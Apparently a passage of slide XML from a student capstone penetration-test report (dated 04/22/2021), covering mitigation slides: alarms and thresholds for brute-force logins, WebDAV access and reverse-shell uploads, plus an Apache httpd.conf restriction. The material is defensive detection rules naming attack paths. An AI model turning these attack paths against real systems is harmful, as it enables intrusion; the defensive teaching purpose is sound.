          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p72"/>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224" name="Google Shape;1224;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future brute force attacks? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>A hourly alarm should be created to alert the security team when multiple failed logins happen with a 5 minute timeframe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>mail an alert to administrator’s email</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>I recommend setting the threshold at 5 failed attempts within 5 minutes</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466799" y="1604700"/>
            <a:ext cx="4400753" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>What configuration can be set on the host to block brute force attacks? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>A Strong Password Policy, Account lock-outs, and an inbound firewall rule to  “Whitelisting “ authorized user’s IP addreses should be implemented. </a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>Describe the solution. If possible, provide the required command line(s). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>Strong Password Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>passwords should be a least 8 characters long and should contain numbers and symbols to provide more complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1" dirty="0"/>
              <a:t>Account Lock-out: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>When a threshold of 5 failed attempts occur within a 5 minute period the account will be locked out. Reset by administrator </a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>Whitelisting Firewall Rule:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Allow Inbound from &lt;user’s IP address&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400"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229"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p73"/>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Mitigation: Detecting the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p73"/>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232" name="Google Shape;1232;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future access to this directory?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>http.request.method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>: GET, POST or PUT and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>url.path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>/* not from 192.168.1.105.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>0&gt; attempts</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1233" name="Google Shape;1233;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What configuration can be set on the host to control access?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>Client should consider disabling WebDav access, or use a more secure way of accessing the webserver, such as a 2-factor authentication to access the WebDav connection.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"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237"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Google Shape;1238;p74"/>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Mitigation: Identifying Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1239" name="Google Shape;1239;p74"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What kind of alarm can be set to detect future file uploads? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>http.request.method: “PUT” and url.path: /webdav/* not from IP address 192.168.1.105. Send an email to administrator’s email</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What threshold would you set to activate this alarm? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1" dirty="0"/>
              <a:t>0&gt; “PUT” requests to /webdav/ from IP address other than 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1241" name="Google Shape;1241;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1604700"/>
            <a:ext cx="4298400" cy="3301800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>What configuration can be set on the host to block file uploads?</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>httpd.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;Directory /var/www/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>allow,deny</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Allow from 127.0.0.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Allow from 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Allow from 192.168.1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Deny from all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LimitExcept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> GET POST HEAD&gt;deny from all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>LimitExcept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;/Directory&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400"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245"/>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EAF188-D266-45C4-A0A7-06D06BFD292D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executive Summary:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E979B9F5-7BD4-48EA-B761-33FBC59F9E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Capstone Penetration Test 04/22/2021 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8EDDA6-452B-4FBE-840B-05A694FFBDAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
